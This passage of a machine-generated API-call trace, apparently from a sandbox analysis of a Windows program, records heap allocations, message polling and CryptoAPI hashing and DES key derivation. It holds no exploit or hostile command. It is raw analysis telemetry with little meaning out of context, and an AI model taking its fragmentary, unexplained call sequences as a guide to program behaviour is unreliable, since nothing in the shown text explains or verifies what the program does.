Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.050] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51508 [0237.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0237.051] CryptHashData (hHash=0xa87050, pbData=0x2e55108, dwDataLen=0x3, dwFlags=0x1) returned 1 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0237.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.052] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.052] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0237.052] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0237.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e514c0 [0237.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e514c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0237.053] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) returned 1 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0237.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0237.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0237.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0237.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0237.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0237.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0237.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0237.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0237.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0237.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0237.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0237.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0237.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0237.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0237.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0237.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0237.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0237.059] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0237.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.060] RtlAllocateHeap (HeapHandle=0x970000, 